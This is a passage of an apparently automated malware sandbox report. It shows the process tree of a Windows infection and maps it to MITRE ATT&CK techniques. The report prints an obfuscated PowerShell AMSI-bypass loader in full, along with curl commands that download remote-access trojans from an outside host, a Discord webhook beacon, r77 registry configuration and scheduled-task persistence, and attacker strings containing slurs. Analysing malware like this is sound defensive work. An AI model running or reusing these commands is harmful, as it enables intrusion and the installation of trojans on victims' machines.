Char](44)+''+'M'+'a'+[Char](110)+''+[Char](97)+''+'g'+'e'+'d'+'');$NXjPmyfoVuP.DefineMethod(''+[Char](73)+''+'n'+''+[Char](118)+''+[Char](111)+'k'+'e'+'','P'+'u'+''+[Char](98)+''+[Char](108)+''+[Char](105)+'c,'+[Char](72)+''+[Char](105)+'d'+[Char](101)+''+[Char](66)+''+[Char](121)+'Si'+[Char](103)+','+'N'+''+[Char](101)+''+[Char](119)+''+[Char](83)+''+[Char](108)+''+[Char](111)+'t,V'+[Char](105)+''+[Char](114)+''+[Char](116)+''+'u'+''+'a'+''+[Char](108)+'',$TIDcXxbMPT,$vnzInwxdNVlxkR).SetImplementationFlags(''+'R'+''+'u'+''+[Char](110)+'ti'+'m'+''+'e'+''+[Char](44)+'M'+'a'+''+[Char](110)+''+'a'+''+[Char](103)+'e'+[Char](100)+'');Write-Output $NXjPmyfoVuP.CreateType();}$EVoIFXBgssuVk=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+''+'s'+'tem'+[Char](46)+''+[Char](100)+'l'+'l'+'')}).GetType(''+'M'+''+[Char](105)+''+[Char](99)+''+'r'+'os'+[Char](111)+''+[Char](102)+''+[Char](116)+''+'.'+''+[Char](87)+''+'i'+'n'+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](85)+'n'+[Char](115)+''+'a'+'f'+[Char](101)+''+[Char](78)+''+'a'+''+[Char](116)+''+[Char](105)+''+[Char](118)+''+[Char](101)+''+'M'+'e'+[Char](116)+''+[Char](104)+''+[Char](111)+'d'+[Char](115)+'');$TmAwZYPapITkyG=$EVoIFXBgssuVk.GetMethod(''+[Char](71)+'etP'+[Char](114)+'oc'+'A'+'ddr'+'e'+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+'b'+''+'l'+''+[Char](105)+'c,Sta'+[Char](116)+'i'+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$KzWRmzRpVOmLQlJvsKc=nOgvgZQkzbuj @([String])([IntPtr]);$LUGoOothUppRrKkYBhYlRR=nOgvgZQkzbuj @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$NtRTrhKPTZo=$EVoIFXBgssuVk.GetMethod(''+[Char](71)+''+[Char](101)+'t'+'M'+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+'l'+''+[Char](101)+''+[Char](72)+'a'+[Char](110)+''+[Char](100)+''+[Char](108)+''+'e'+'').Invoke($Null,@([Object](''+'k'+''+'e'+''+[Char](114)+''+'n'+''+'e'+''+'l'+''+'3'+''+[Char](50)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$hwYuowfmghXRom=$TmAwZYPapITkyG.Invoke($Null,@([Object]$NtRTrhKPTZo,[Object](''+'L'+''+[Char](111)+''+[Char](97)+''+[Char](100)+''+[Char](76)+''+[Char](105)+''+[Char](98)+''+[Char](114)+''+[Char](97)+''+[Char](114)+''+[Char](121)+''+[Char](65)+'')));$qxljhDmIdJFNkpiDr=$TmAwZYPapITkyG.Invoke($Null,@([Object]$NtRTrhKPTZo,[Object](''+[Char](86)+'i'+[Char](114)+''+[Char](116)+''+[Char](117)+''+'a'+''+[Char](108)+'P'+[Char](114)+'o'+'t'+''+'e'+'c'+'t'+'')));$LDgGrYP=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($hwYuowfmghXRom,$KzWRmzRpVOmLQlJvsKc).Invoke(''+'a'+'ms'+'i'+'.'+[Char](100)+''+[Char](108)+'l');$tnRKkWGugYLpMcilx=$TmAwZYPapITkyG.Invoke($Null,@([Object]$LDgGrYP,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+'i'+[Char](83)+''+'c'+'a'+[Char](110)+''+'B'+''+[Char](117)+''+[Char](102)+'f'+[Char](101)+''+'r'+'')));$BaLQpIPOrR=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($qxljhDmIdJFNkpiDr,$LUGoOothUppRrKkYBhYlRR).Invoke($tnRKkWGugYLpMcilx,[uint32]8,4,[ref]$BaLQpIPOrR);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$tnRKkWGugYLpMcilx,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($qxljhDmIdJFNkpiDr,$LUGoOothUppRrKkYBhYlRR).Invoke($tnRKkWGugYLpMcilx,[uint32]8,0x20,[ref]$BaLQpIPOrR);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'OF'+[Char](84)+''+[Char](87)+''+'A'+''+'R'+''+'E'+'').GetValue('$'+'7'+''+[Char](55)+'s'+[Char](116)+''+'a'+'ge'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4876

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:4972

C:\Users\Admin\AppData\Roaming\$77-scchost.exe
C:\Users\Admin\AppData\Roaming\$77-scchost.exe
2⤵
PID:1144

C:\Users\Admin\AppData\Roaming\$77-penisware.exe
C:\Users\Admin\AppData\Roaming\$77-penisware.exe
2⤵
PID:4876

C:\Users\Admin\AppData\Roaming\$77-scchost.exe
C:\Users\Admin\AppData\Roaming\$77-scchost.exe
2⤵
PID:4308

C:\Users\Admin\AppData\Roaming\$77-penisware.exe
C:\Users\Admin\AppData\Roaming\$77-penisware.exe
2⤵
PID:5044

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1244

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
- Drops file in System32 directory
PID:1280

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1312

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1372

C:\Windows\system32\sihost.exe
sihost.exe
2⤵
PID:2808

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1400

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1532

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1548

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1560

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1684

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1700

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1756

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1820

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1868

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:1920

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1932

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:2000

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1384

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:1736

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2124

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2216

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2416

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2424

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
PID:2464

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2536

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2560

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2572

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2600

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2608

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2848

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:3048

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:3060

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3188

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3372

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\dropper_1.bat"
2⤵
- Suspicious use of WriteProcessMemory
PID:2432

C:\Windows\system32\chcp.com
chcp 65001
3⤵
PID:3832

C:\Windows\system32\curl.exe
C:\Windows\system32\curl "https://discord.com/api/webhooks/1250147812503584798/kM-golxLeBjZkcQMdjxFBJ8cEzMjI9zUI-ekNo5GaP0xIAPrgIM71FdqGQFE9zwSksRt" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""@everyone"",""embeds"":[{""title"":""Loader Was Ran By Admin!"",""color"":16711680,""author"":{""name"":""Sexy Niggas""},""footer"":{""text"":""UD Loader - Mon 06/17/2024 21:31:49.45""}}],""username"":""UD Loader"",""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"
3⤵
PID:668

C:\Windows\system32\curl.exe
C:\Windows\system32\curl "https://penisware.com/r77/Install.exe" --output "C:\Windows\Resources\$77-install.exe"
3⤵
- Drops file in Windows directory
PID:4520

C:\Windows\system32\curl.exe
C:\Windows\system32\curl https://penisware.com/xworm/sdchost.exe --output C:\Windows\Resources\$77-sdchost.exe
3⤵
- Drops file in Windows directory
PID:2440

C:\Windows\system32\curl.exe
C:\Windows\system32\curl https://penisware.com/venom/scchost.exe --output C:\Windows\Resources\$77-scchost.exe
3⤵
- Drops file in Windows directory
PID:3000

C:\Windows\system32\curl.exe
C:\Windows\system32\curl https://penisware.com/xworm/penisware-gold.exe --output C:\Windows\Resources\$77-penisware.exe
3⤵
- Drops file in Windows directory
PID:4724

C:\Windows\system32\curl.exe
C:\Windows\system32\curl https://penisware.com/venom/penisware2.exe --output C:\Windows\Resources\$77-penisware2.exe
3⤵
- Drops file in Windows directory
PID:3660

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y "
3⤵
PID:2160

C:\Windows\system32\reg.exe
C:\Windows\system32\reg add HKEY_LOCAL_MACHINE\SOFTWARE\$77config\paths /v wow /d C:\Windows\Resources\$77-sdchost.exe
3⤵
PID:1988

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y "
3⤵
PID:2860

C:\Windows\system32\reg.exe
C:\Windows\system32\reg add HKEY_LOCAL_MACHINE\SOFTWARE\$77config\process_names /v wow /d $77-sdchost.exe
3⤵
PID:2708

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y "
3⤵
PID:3772

C:\Windows\system32\reg.exe
C:\Windows\system32\reg add HKEY_LOCAL_MACHINE\SOFTWARE\$77config\startup /v wow /d C:\Windows\Resources\$77-sdchost.exe
3⤵
PID:5016

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y "
3⤵
PID:2928

C:\Windows\system32\reg.exe
C:\Windows\system32\reg add HKEY_LOCAL_MACHINE\SOFTWARE\$77config\paths /v wow /d C:\Windows\Resources\$77-scchost.exe
3⤵
PID:2632

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y "
3⤵
PID:3300

C:\Windows\system32\reg.exe
C:\Windows\system32\reg add HKEY_LOCAL_MACHINE\SOFTWARE\$77config\process_names /v wow /d $77-scchost.exe
3⤵
PID:3492

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y "
3⤵
PID:2400

C:\Windows\system32\reg.exe
C:\Windows\system32\reg add HKEY_LOCAL_MACHINE\SOFTWARE\$77config\startup /v wow /d C:\Windows\Resources\$77-scchost.exe
3⤵
PID:908

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y "
3⤵
PID:2380

C:\Windows\system32\reg.exe
C:\Windows\system32\reg add HKEY_LOCAL_MACHINE\SOFTWARE\$77config\paths /v wow /d C:\Windows\Resources\$77-penisware.exe
3⤵
PID:2176

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y "
3⤵
PID:1044

C:\Windows\system32\reg.exe
C:\Windows\system32\reg add HKEY_LOCAL_MACHINE\SOFTWARE\$77config\process_names /v wow /d $77-penisware.exe
3⤵
PID:4032

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y "
3⤵
PID:2336

C:\Windows\system32\reg.exe
C:\Windows\system32\reg add HKEY_LOCAL_MACHINE\SOFTWARE\$77config\startup /v wow /d C:\Windows\Resources\$77-penisware.exe
3⤵
PID:4044

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y "
3⤵
PID:1996

C:\Windows\system32\reg.exe
C:\Windows\system32\reg add HKEY_LOCAL_MACHINE\SOFTWARE\$77config\paths /v wow /d C:\Windows\Resources\$77-penisware2.exe
3⤵
PID:4272

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y "
3⤵
PID:1752

C:\Windows\system32\reg.exe
C:\Windows\system32\reg add HKEY_LOCAL_MACHINE\SOFTWARE\$77config\process_names /v wow /d $77-penisware2.exe
3⤵
PID:1416

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y "
3⤵
PID:4444

C:\Windows\system32\reg.exe
C:\Windows\system32\reg add HKEY_LOCAL_MACHINE\SOFTWARE\$77config\startup /v wow /d C:\Windows\Resources\$77-penisware2.exe
3⤵
PID:3200

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y "
3⤵
PID:2628

C:\Windows\system32\reg.exe
C:\Windows\system32\reg add HKEY_LOCAL_MACHINE\SOFTWARE\$77config\paths /v wow /d C:\Windows\Resources\$77-install.exe
3⤵
PID:3020

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y "
3⤵
PID:5032

C:\Windows\system32\reg.exe
C:\Windows\system32\reg add HKEY_LOCAL_MACHINE\SOFTWARE\$77config\process_names /v wow /d $77-install.exe
3⤵
PID:4488

C:\Windows\Resources\$77-sdchost.exe
"C:\Windows\Resources\$77-sdchost.exe"
3⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
PID:3664

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "$77-scchost" /tr "C:\Users\Admin\AppData\Roaming\$77-scchost.exe"
4⤵
- Creates scheduled task(s)
PID:3424

C:\Windows\Resources\$77-scchost.exe
"C:\Windows\Resources\$77-scchost.exe"
3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1572

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "$77-sachost" /tr '"C:\Users\Admin\AppData\Roaming\$77-sachost.exe"' & exit
4⤵
PID:3532

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "$77-sachost" /tr '"C:\Users\Admin\AppData\Roaming\$77-sachost.exe"'
5⤵
- Creates scheduled task(s)
PID:372

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp1C3D.tmp.bat""
4⤵
PID:3660

C:\Windows\system32\timeout.exe
timeout 3
5⤵
- Delays execution with timeout.exe
PID:2252

C:\Users\Admin\AppData\Roaming\$77-sachost.exe
"C:\Users\Admin\AppData\Roaming\$77-sachost.exe"
5⤵
- Executes dropped EXE
PID:2260

C:\Windows\Resources\$77-penisware.exe
"C:\Windows\Resources\$77-penisware.exe"
3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4620

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "$77-penisware" /tr "C:\Users\Admin\AppData\Roaming\$77-penisware.exe"
4⤵
- Creates scheduled task(s)
PID:2664

C:\Windows\Resources\$77-penisware2.exe
"C:\Windows\Resources\$77-penisware2.exe"
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1624

C:\Windows\system32\timeout.exe
timeout 2
3⤵
- Delays execution with timeout.exe
PID:4432

C:\Windows\Resources\$77-install.exe
"C:\Windows\Resources\$77-install.exe"
3⤵
- Executes dropped EXE
PID:3996

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3564

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3756

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3972

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4108

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4800

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:460

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:2056

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
PID:2164

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:3216

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
- Modifies data under HKEY_USERS
PID:2652

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:4368

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:4240

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc
1⤵
PID:2292

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window
1⤵
PID:3848

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=122.0.6261.70 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=122.0.2365.52 --initial-client-data=0x23c,0x240,0x244,0x238,0x214,0x7ff825262e98,0x7ff825262ea4,0x7ff825262eb0
2⤵
PID:1292

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=2800 --field-trial-handle=2744,i,16362475727591565961,3676688664819797550,262144 --variations-seed-version /prefetch:3
2⤵
PID:3112

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4272 --field-trial-handle=2744,i,16362475727591565961,3676688664819797550,262144 --variations-seed-version /prefetch:8
2⤵
PID:3472

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
1⤵
PID:952

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe
1⤵
PID:348

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:4744

C:\Windows\System32\WaaSMedicAgent.exe
C:\Windows\System32\WaaSMedicAgent.exe 53d7028c9998346eea8dc053f743257f POQLc0mj1k60avLBwT7KDw.0.1.0.0.0
1⤵
- Sets service image path in registry
PID:668

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
2⤵
PID:2404

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
1⤵
PID:2888

C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
1⤵
PID:3004

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
1⤵
- Checks processor information in registry
PID:2224

C:\Windows\System32\mousocoreworker.exe
C:\Windows\System32\mousocoreworker.exe -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:4296

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

Scheduled Task/Job

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

System Information Discovery